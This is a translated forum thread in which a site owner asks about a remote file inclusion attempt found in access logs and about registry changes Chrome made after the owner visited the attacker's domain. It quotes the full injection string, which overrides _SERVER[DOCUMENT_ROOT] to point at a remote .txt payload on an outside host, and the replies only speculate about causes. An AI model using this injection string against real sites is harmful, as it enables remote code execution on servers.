Итак, я недавно просматривал журналы доступа к моему сайту и заметил несколько попыток сделать что-то вроде этого
?page=pics//?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr//skin_shop/.../cms/idf.txt??
Конечно, я не совсем глуп, и это никак не повлияло на мой сервер или программное обеспечение, но я подумал, черт возьми, я посмотрю, что на самом деле находится в этом домене. После загрузки Chrome попытался изменить ключ реестра в соответствии с Comodo. Есть ли способ на самом деле изменить ключ реестра из кода, который запускает браузер, или это было необычным совпадением, что Chrome, впервые, который я видел, попытался изменить раздел реестра.
Изменить: было сделано 4 попытки модификации разных ключей в HKLM / SYSTEM / ControlSet001 / Services / ESENT
Я бы сказал, что это было случайностью, хотя нельзя исключать и хитрых дыр в системе безопасности. Возможно, вы сообщите нам, что это за ключ реестра.
Хорошо, я вижу твою правку. (И почему Джефф изменил ключ реестра?) Позвольте мне перефразировать - можем ли мы узнать, какой точный ключи реестра они были и какие точные значения он хотел установить?
Во всяком случае, ESENT оказывается какой-то встроенный движок базы данных в Windows.
Теперь возможно, что веб-страница использовала некоторую дыру в безопасности в Chrome и через нее пыталась захватить ESENT, чтобы получить полный контроль над системой. Звучит довольно логично.
Также возможно, что Chrome (или какой-то его плагин, например, видеоплеер) использовал ESENT законным образом, и именно ESENT хотел изменить некоторые из своих ключей реестра.
В Chrome есть встроенное хранилище (Google Gears). Возможно ли, что он пытается сохранить свою локальную базу данных в реестре?
В _SERVER[DOCUMENT_ROOT]
заставляет меня думать, что он пытается изменить то, что PHP считает корнем документа веб-сервера, чтобы выполнить PHP в связанном файле. Я не знал, что вы можете это сделать, но, может быть, в какой-то конкретной версии PHP есть эксплойт?
Возможно ли, что Chrome изменяет ключи реестра с посещением URL-адреса или без него, и что это совершенно не связано?